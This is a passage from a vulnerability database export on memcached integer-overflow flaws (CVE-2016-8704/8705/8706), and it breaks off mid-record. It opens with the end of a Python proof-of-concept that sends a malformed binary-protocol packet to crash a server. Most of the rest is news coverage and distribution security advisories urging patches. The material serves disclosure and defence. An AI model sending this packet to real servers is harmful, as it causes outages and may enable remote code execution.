\nOPCODE_SET = \"\\x21\" \nkey_len = struct.pack(\"!H\",32) \nbody_len = struct.pack(\"!I\",1) \npacket = MEMCACHED_REQUEST_MAGIC + OPCODE_SET + key_len + body_len*2 + \"A\"*1000 \nif len(sys.argv) != 3: \nprint \"./poc_sasl.py <server> <ip>\" \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((sys.argv[1],int(sys.argv[2]))) \ns.sendall(packet) \nprint s.recv(1024) \ns.close() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/139572/memcache-poc.txt"}], "thn": [{"lastseen": "2018-01-27T10:06:58", "bulletinFamily": "info", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "[](<https://3.bp.blogspot.com/-WfDOuFmgJLo/WW4pkRfGFkI/AAAAAAAAtqQ/rNakdiVULsgnWngXlDAj0e0RfkdcvZDdQCLcBGAs/s1600/memcached-vulnerabilities.png>)\n\nNothing in this world is fully secure, from our borders to cyberspace. 
I know vulnerabilities are bad, but the worst part comes in when people just don't care to apply patches on time. \n \nLate last year, Cisco's Talos intelligence and research group discovered [three critical remote code execution](<https://thehackernews.com/2016/11/memcached-hacking.html>) (RCE) vulnerabilities in Memcached that exposed major websites including Facebook, Twitter, YouTube, Reddit, to hackers. \n \nMemcached is a popular open-source and easily deployable distributed caching system that allows objects to be stored in memory. \n \nThe Memcached application has been designed to speed up dynamic web applications (_for example php-based websites)_ by reducing stress on the database that helps administrators to increase performance and scale web applications. \n \nIt's been almost eight months since the Memcached developers have released patches for three critical RCE vulnerabilities (CVE-2016-8704, CVE-2016-8705 and CVE-2016-8706) but tens of thousands of servers running Memcached application are still vulnerable, allowing attackers to steal sensitive data remotely. \n \nResearchers at Talos [conducted](<http://blog.talosintelligence.com/2017/07/memcached-patch-failure.html>) Internet scans on two different occasions, one in late February and another in July, to find out how many servers are still running the vulnerable version of the Memcached application. \n \nAnd the results are surprising... \n \n\n\n**_Results from February Scan:_**\n\n \n \n\n\n * Total servers exposed on the Internet \u2014 107,786\n * Servers still vulnerable \u2014 85,121\n * Servers still vulnerable but require authentication \u2014 23,707\n \n \nAnd the top 5 countries with most vulnerable servers are the United States, followed by China, United Kingdom, France and Germany. 
\n \n\n\n**_Results from July Scan:_**\n\n \n \n\n\n * Total servers exposed on the Internet \u2014 106,001\n * Servers still vulnerable \u2014 73,403\n * Servers still vulnerable but require authentication \u2014 18,012\n \n \nAfter comparing results from both Internet scans, researchers learned that only 2,958 servers found vulnerable in the February scan had been patched before the July scan, while the remaining servers are still vulnerable to the remote hack. \n \n\n\n### Data Breach & Ransom Threats\n\n \nThis ignorance by organisations to apply patches on time is concerning, as Talos researchers warned that these vulnerable Memcached installations could be an easy target of [ransomware attacks](<https://thehackernews.com/2017/01/secure-mongodb-database.html>) similar to the one that hit [MongoDB databases](<https://thehackernews.com/2017/01/mongodb-database-security.html>) in late December. \n \nAlthough unlike MongoDB, Memcached is not a database, it \"_can still contain sensitive information and disruption in the service availability would certainly lead to further disruptions on dependent services._\" \n \nThe flaws in Memcached could allow hackers to replace cached content with their malicious one to deface the website, serve phishing pages, ransom threats, and malicious links to hijack victim's machine, placing hundreds of millions of online users at risk. \n \n\n\n> \"With the recent spate of worm attacks leveraging vulnerabilities this should be a red flag for administrators around the world,\" the researchers concluded.\n\n> \n\"If left unaddressed the vulnerabilities could be leveraged to impact organisations globally and affect business severely. 
It is highly recommended that these systems be patched immediately to help mitigate the risk to organisations.\"\n\n \nCustomers and organisations are advised to apply the patch as soon as possible even to Memcached deployments in \"trusted\" environments, as attackers with existing access could target vulnerable servers to move laterally within those networks.\n", "modified": "2017-07-18T15:52:43", "published": "2017-07-18T04:52:00", "id": "THN:D62B44A1B8B3D803033457090AB49300", "href": "https://thehackernews.com/2017/07/memcached-vulnerabilities.html", "type": "thn", "title": "Over 70,000 Memcached Servers Still Vulnerable to Remote Hacking", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:22:27", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3704-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nNovember 03, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : memcached\nCVE ID : CVE-2016-8704 CVE-2016-8705 CVE-2016-8706\nDebian Bug : 842811 842812 842814\n\nAleksandar Nikolic of Cisco Talos discovered several integer overflow\nvulnerabilities in memcached, a high-performance memory object caching\nsystem. 
A remote attacker can take advantage of these flaws to cause a\ndenial of service (daemon crash), or potentially to execute arbitrary\ncode.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.4.21-1.1+deb8u1.\n\nWe recommend that you upgrade your memcached packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2016-11-03T16:24:31", "published": "2016-11-03T16:24:31", "id": "DEBIAN:DSA-3704-1:B1F3F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00287.html", "title": "[SECURITY] [DSA 3704-1] memcached security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:42", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7291", "CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "Package : memcached\nVersion : 1.4.13-0.2+deb7u2\nCVE ID : CVE-2013-7291 CVE-2016-8704 CVE-2016-8705 CVE-2016-8706\nDebian Bug : 735314 842811 842812 842814\n\n\nMultiple vulnerabilities have been found in memcached, a high-performance\nmemory object caching system. A remote attacker could take advantage of\nthese flaws to cause a denial of service (daemon crash), or potentially\nto execute arbitrary code.\t\n\nCVE-2013-7291\n\n It was discovered that memcached, when running in verbose mode, can\n be crashed by sending carefully crafted requests that trigger an\n unbounded key print, resulting in a daemon crash.\n\nCVE-2016-8704, CVE-2016-8705, CVE-2016-8706\n\n Aleksandar Nikolic of Cisco Talos found several vulnerabilities in\n memcached. 
A remote attacker could cause an integer overflow by\n sending carefully crafted requests to the memcached server,\n resulting in a daemon crash.\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n1.4.13-0.2+deb7u2.\n\nWe recommend that you upgrade your memcached packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n\n- -- \nJonas Meurer\n\n\n", "edition": 2, "modified": "2016-11-05T14:57:45", "published": "2016-11-05T14:57:45", "id": "DEBIAN:DLA-701-1:E0C8E", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201611/msg00009.html", "title": "[SECURITY] [DLA 701-1] memcached security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2017-9951"], "description": "Package : memcached\nVersion : 1.4.13-0.2+deb7u3\nCVE ID : CVE-2017-9951\nDebian Bug : #868701\n\nIt was discovered that there was a remote denial-of-service (DoS) vulnerability\nin memcached, a high-performance memory object caching system.\n\nThe try_read_command function allowed remote attackers to cause a DoS via a\nrequest to add/set a key that makes a comparison between a signed and unsigned\ninteger which triggered a heap-based buffer over-read.\n\nThis vulnerability existed due to an incomplete upstream fix for CVE-2016-8705.\n\nFor Debian 7 \"Wheezy\", this issue has been fixed in memcached version\n1.4.13-0.2+deb7u3.\n\nWe recommend that you upgrade your memcached packages.\n\n\nRegards,\n\n- -- \n ,''`.\n : :' : Chris Lamb\n `. 
`'` lamby@debian.org / chris-lamb.co.uk\n `-\n\n", "edition": 2, "modified": "2017-07-20T09:08:24", "published": "2017-07-20T09:08:24", "id": "DEBIAN:DLA-1033-1:E6844", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201707/msg00025.html", "title": "[SECURITY] [DLA 1033-1] memcached security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:23:07", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2018-1000115", "CVE-2018-1000127", "CVE-2017-9951"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4218-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 06, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : memcached\nCVE ID : CVE-2017-9951 CVE-2018-1000115 CVE-2018-1000127\nDebian Bug : 868701 894404\n\nSeveral vulnerabilities were discovered in memcached, a high-performance\nmemory object caching system. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2017-9951\n\n Daniel Shapira reported a heap-based buffer over-read in memcached\n (resulting from an incomplete fix for CVE-2016-8705) triggered by\n specially crafted requests to add/set a key and allowing a remote\n attacker to cause a denial of service.\n\nCVE-2018-1000115\n\n It was reported that memcached listens to UDP by default. A remote\n attacker can take advantage of it to use the memcached service as a\n DDoS amplifier.\n\n Default installations of memcached in Debian are not affected by\n this issue as the installation defaults to listen only on localhost.\n This update disables the UDP port by default. 
Listening on the UDP\n can be re-enabled in the /etc/memcached.conf (cf.\n /usr/share/doc/memcached/NEWS.Debian.gz).\n\nCVE-2018-1000127\n\n An integer overflow was reported in memcached, resulting in resource\n leaks, data corruption, deadlocks or crashes.\n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 1.4.21-1.1+deb8u2.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1.4.33-1+deb9u1.\n\nWe recommend that you upgrade your memcached packages.\n\nFor the detailed security status of memcached please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/memcached\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2018-06-06T18:52:57", "published": "2018-06-06T18:52:57", "id": "DEBIAN:DSA-4218-1:F15A6", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00147.html", "title": "[SECURITY] [DSA 4218-1] memcached security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:44:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "Aleksandar Nikolic discovered that Memcached incorrectly handled certain \nmalformed commands. 
A remote attacker could use this issue to cause \nMemcached to crash, resulting in a denial of service, or possibly execute \narbitrary code.", "edition": 5, "modified": "2016-11-02T00:00:00", "published": "2016-11-02T00:00:00", "id": "USN-3120-1", "href": "https://ubuntu.com/security/notices/USN-3120-1", "title": "Memcached vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:36:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "**Issue Overview:**\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. ([CVE-2016-8704 __](<https://access.redhat.com/security/cve/CVE-2016-8704>), [CVE-2016-8705 __](<https://access.redhat.com/security/cve/CVE-2016-8705>))\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in memcached's parsing of SASL authentication messages. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. ([CVE-2016-8706 __](<https://access.redhat.com/security/cve/CVE-2016-8706>))\n\n \n**Affected Packages:** \n\n\nmemcached\n\n \n**Issue Correction:** \nRun _yum update memcached_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n memcached-1.4.15-9.13.amzn1.i686 \n memcached-debuginfo-1.4.15-9.13.amzn1.i686 \n memcached-devel-1.4.15-9.13.amzn1.i686 \n \n src: \n memcached-1.4.15-9.13.amzn1.src \n \n x86_64: \n memcached-1.4.15-9.13.amzn1.x86_64 \n memcached-devel-1.4.15-9.13.amzn1.x86_64 \n memcached-debuginfo-1.4.15-9.13.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2016-11-10T18:00:00", "published": "2016-11-10T18:00:00", "id": "ALAS-2016-761", "href": "https://alas.aws.amazon.com/ALAS-2016-761.html", "title": "Important: memcached", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2017-01-02T15:12:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "edition": 1, "description": "### Background\n\nmemcached is a high-performance, distributed memory object caching system \n\n### Description\n\nMultiple integer overflow vulnerabilities were discovered in memcached. Please review the CVE identifiers and Cisco TALOS reports referenced below for details. \n\n### Impact\n\nA remote attacker could abuse memcached\u2019s binary protocol leading to the remote execution of arbitrary code. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll memcached users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/memcached-1.4.33\"", "modified": "2017-01-02T00:00:00", "published": "2017-01-02T00:00:00", "href": "https://security.gentoo.org/glsa/201701-12", "id": "GLSA-201701-12", "type": "gentoo", "title": "memcached: Multiple vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "\nCisco Talos reports:\n\nMultiple integer overflow vulnerabilities exist within Memcached\n\t that could be exploited to achieve remote code execution on the\n\t targeted system. These vulnerabilities manifest in various Memcached\n\t functions that are used in inserting, appending, prepending, or\n\t modifying key-value data pairs. Systems which also have Memcached\n\t compiled with support for SASL authentication are also vulnerable to\n\t a third flaw due to how Memcached handles SASL authentication\n\t commands.\nAn attacker could exploit these vulnerabilities by sending a\n\t specifically crafted Memcached command to the targeted server.\n\t Additionally, these vulnerabilities could also be exploited to leak\n\t sensitive process information which an attacker could use to bypass\n\t common exploitation mitigations, such as ASLR, and can be triggered\n\t multiple times. 
This enables reliable exploitation which makes these\n\t vulnerabilities severe.\n\n", "edition": 5, "modified": "2016-10-31T00:00:00", "published": "2016-10-31T00:00:00", "id": "F4BF713F-6AC7-4B76-8980-47BF90C5419F", "href": "https://vuxml.freebsd.org/freebsd/f4bf713f-6ac7-4b76-8980-47bf90c5419f.html", "title": "memcached -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705", "CVE-2016-8706"], "description": "Arch Linux Security Advisory ASA-201611-1\n=========================================\n\nSeverity: Critical\nDate : 2016-11-01\nCVE-ID : CVE-2016-8704 CVE-2016-8705 CVE-2016-8706\nPackage : memcached\nType : arbitrary code execution\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package memcached before version 1.4.32-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 1.4.32-1.\n\n# pacman -Syu \"memcached>=1.4.32-1\"\n\nThe problems have been fixed upstream in version 1.4.32.\n\nWorkaround\n==========\n\nIf you do not use the binary protocol at all, a workaround is to start\nmemcached with \"-B ascii\" to disable it.\n\nDescription\n===========\n\n- CVE-2016-8704 (arbitrary code execution)\n\nAn integer overflow in the process_bin_append_prepend function which is\nresponsible for processing multiple commands of Memcached binary\nprotocol can be abused to cause heap overflow and lead to remote code\nexecution.\n\n- CVE-2016-8705 (arbitrary code execution)\n\nMultiple integer overflows in process_bin_update function which is\nresponsible for processing multiple commands of Memcached binary\nprotocol can be abused to cause heap overflow and lead to remote code\nexecution.\n\n- CVE-2016-8706 (arbitrary code execution)\n\nAn integer overflow in process_bin_sasl_auth function which is\nresponsible for 
authentication commands of Memcached binary protocol\ncan be abused to cause heap overflow and lead to remote code execution.\n\nImpact\n======\n\nA remote unauthenticated attacker can execute arbitrary code on the\naffected host.\n\nReferences\n==========\n\nhttp://www.talosintelligence.com/reports/TALOS-2016-0219/\nhttp://www.talosintelligence.com/reports/TALOS-2016-0220/\nhttp://www.talosintelligence.com/reports/TALOS-2016-0221/\nhttp://blog.talosintel.com/2016/10/memcached-vulnerabilities.html\nhttps://github.com/memcached/memcached/wiki/ReleaseNotes1433\nhttps://access.redhat.com/security/cve/CVE-2016-8704\nhttps://access.redhat.com/security/cve/CVE-2016-8705\nhttps://access.redhat.com/security/cve/CVE-2016-8706", "modified": "2016-11-01T00:00:00", "published": "2016-11-01T00:00:00", "id": "ASA-201611-1", "href": "https://security.archlinux.org/ASA-201611-1", "type": "archlinux", "title": "[ASA-201611-1] memcached: arbitrary code execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "[0:1.4.4-3.el6_8.1]\n- fix vulnerabilities allowing remote code execution (CVE-2016-8704,\n CVE-2016-8705, CVE-2016-8706)", "edition": 4, "modified": "2016-11-23T00:00:00", "published": "2016-11-23T00:00:00", "id": "ELSA-2016-2820", "href": "http://linux.oracle.com/errata/ELSA-2016-2820.html", "title": "memcached security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-22T17:06:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2013-7239", "CVE-2016-8706"], "description": "[0:1.4.15-10.el7_3.1]\n- fix vulnerabilities allowing remote code execution (CVE-2016-8704,\n CVE-2016-8705, CVE-2016-8706)\n[0:1.4.15-10]\n- fix binding to IPv6 address (#1298603)\n- enable SASL support (#1263696)\n- don't allow 
authentication with bad SASL credentials (CVE-2013-7239)", "edition": 5, "modified": "2016-11-23T00:00:00", "published": "2016-11-23T00:00:00", "id": "ELSA-2016-2819", "href": "http://linux.oracle.com/errata/ELSA-2016-2819.html", "title": "memcached security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:27:11", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "**CentOS Errata and Security Advisory** CESA-2016:2819\n\n\nmemcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.\n\nSecurity Fix(es):\n\n* Two integer overflow flaws, leading to heap-based buffer overflows, were found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. (CVE-2016-8704, CVE-2016-8705)\n\n* An integer overflow flaw, leading to a heap-based buffer overflow, was found in memcached's parsing of SASL authentication messages. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. 
(CVE-2016-8706)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2016-November/003682.html\n\n**Affected packages:**\nmemcached\nmemcached-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2819.html", "edition": 3, "modified": "2016-11-25T16:47:41", "published": "2016-11-25T16:47:41", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2016-November/003682.html", "id": "CESA-2016:2819", "title": "memcached security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-08T03:36:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2016-8704"], "description": "**CentOS Errata and Security Advisory** CESA-2016:2820\n\n\nmemcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.\n\nSecurity Fix(es):\n\n* Two integer overflow flaws, leading to heap-based buffer overflows, were found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. 
(CVE-2016-8704, CVE-2016-8705)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-November/034199.html\n\n**Affected packages:**\nmemcached\nmemcached-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2820.html", "edition": 4, "modified": "2016-11-28T22:32:14", "published": "2016-11-28T22:32:14", "href": "http://lists.centos.org/pipermail/centos-announce/2016-November/034199.html", "id": "CESA-2016:2820", "title": "memcached security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:52", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705", "CVE-2016-8706"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.\n\nSecurity Fix(es):\n\n* Two integer overflow flaws, leading to heap-based buffer overflows, were found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. (CVE-2016-8704, CVE-2016-8705)\n\n* An integer overflow flaw, leading to a heap-based buffer overflow, was found in memcached's parsing of SASL authentication messages. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. 
(CVE-2016-8706)", "modified": "2018-04-12T03:33:06", "published": "2016-11-23T09:43:57", "id": "RHSA-2016:2819", "href": "https://access.redhat.com/errata/RHSA-2016:2819", "type": "redhat", "title": "(RHSA-2016:2819) Important: memcached security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:35", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705"], "description": "Red Hat Mobile Application Platform (RHMAP) 4.2 is delivered as a set of Docker-formatted container images. In addition to the images, several components are delivered as RPMs:\n\n* OpenShift templates used to deploy an RHMAP Core and MBaaS\n* A diagnostic tool called 'fh-system-dump-tool', which can be used to collect information about the RHMAP cluster in case of problems\n\nThe following RPMs are included in the RHMAP container images, and are provided here only for completeness:\n\n* The Nagios server, which is used to monitor the status of RHMAP components, is installed inside the Nagios container image.\n* PhantomJS, a headless WebKit scriptable with a JavaScript API, is installed inside the MBaaS and Supercore container images.\n* 'mod_authnz_external', an Apache module used for authentication, is installed inside the httpd container image.\n\nA ZIP package containing client SDKs is also delivered as an optional download. The same ZIP file is also provided inside the 'rhmap42/fh-sdks' container image.\n\nThis release serves as an update for Red Hat Mobile Application Platform 4.2.0. It includes bug fixes and enhancements. Refer to the Red Hat Mobile Application Platform 4.2.1 Release Notes for information about the most significant bug fixes and enhancements included in this release.\n\nSecurity Fix(es):\n\n* An integer overflow flaw, leading to a heap-based buffer overflow, was found in the memcached binary protocol. 
An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. (CVE-2016-8704)\n\n* An integer overflow flaw, leading to a heap-based buffer overflow, was found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. (CVE-2016-8705)", "modified": "2017-01-11T21:28:02", "published": "2017-01-11T21:26:55", "id": "RHSA-2017:0059", "href": "https://access.redhat.com/errata/RHSA-2017:0059", "type": "redhat", "title": "(RHSA-2017:0059) Moderate: Red Hat Mobile Application Platform 4.2.1 Security Update - SDKs and RPMs", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.\n\nSecurity Fix(es):\n\n* Two integer overflow flaws, leading to heap-based buffer overflows, were found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code. 
(CVE-2016-8704, CVE-2016-8705)", "modified": "2018-06-06T20:24:17", "published": "2016-11-23T09:44:15", "id": "RHSA-2016:2820", "href": "https://access.redhat.com/errata/RHSA-2016:2820", "type": "redhat", "title": "(RHSA-2016:2820) Important: memcached security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705", "CVE-2016-8706"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load. ", "modified": "2016-12-08T03:53:46", "published": "2016-12-08T03:53:46", "id": "FEDORA:ACF9D6101A4C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: memcached-1.4.33-1.fc25", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705", "CVE-2016-8706"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load. ", "modified": "2016-11-14T23:52:16", "published": "2016-11-14T23:52:16", "id": "FEDORA:9037C6068705", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: memcached-1.4.17-5.fc23", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8704", "CVE-2016-8705", "CVE-2016-8706"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load. 
", "modified": "2016-11-14T21:02:25", "published": "2016-11-14T21:02:25", "id": "FEDORA:8C07F604CD91", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: memcached-1.4.25-2.fc24", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2017-9951"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load. ", "modified": "2017-11-22T02:32:28", "published": "2017-11-22T02:32:28", "id": "FEDORA:8EEC5601CEEA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: memcached-1.4.39-1.fc26", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8705", "CVE-2017-9951"], "description": "memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load. ", "modified": "2017-11-22T05:09:09", "published": "2017-11-22T05:09:09", "id": "FEDORA:C0B6E60419A6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: memcached-1.4.39-1.fc25", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-17T13:49:28", "description": "Security Fix(es) :\n\n - Two integer overflow flaws, leading to heap-based buffer\n overflows, were found in the memcached binary protocol.\n An attacker could create a specially crafted message\n that would cause the memcached server to crash or,\n potentially, execute arbitrary code. (CVE-2016-8704,\n CVE-2016-8705)\n\n - An integer overflow flaw, leading to a heap-based buffer\n overflow, was found in memcached's parsing of SASL\n authentication messages. 
An attacker could create a\n specially crafted message that would cause the memcached\n server to crash or, potentially, execute arbitrary code.\n (CVE-2016-8706)", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-15T00:00:00", "title": "Scientific Linux Security Update : memcached on SL7.x x86_64 (20161123)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-12-15T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:memcached", "p-cpe:/a:fermilab:scientific_linux:memcached-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:memcached-debuginfo"], "id": "SL_20161123_MEMCACHED_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/95866", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95866);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n\n script_name(english:\"Scientific Linux Security Update : memcached on SL7.x x86_64 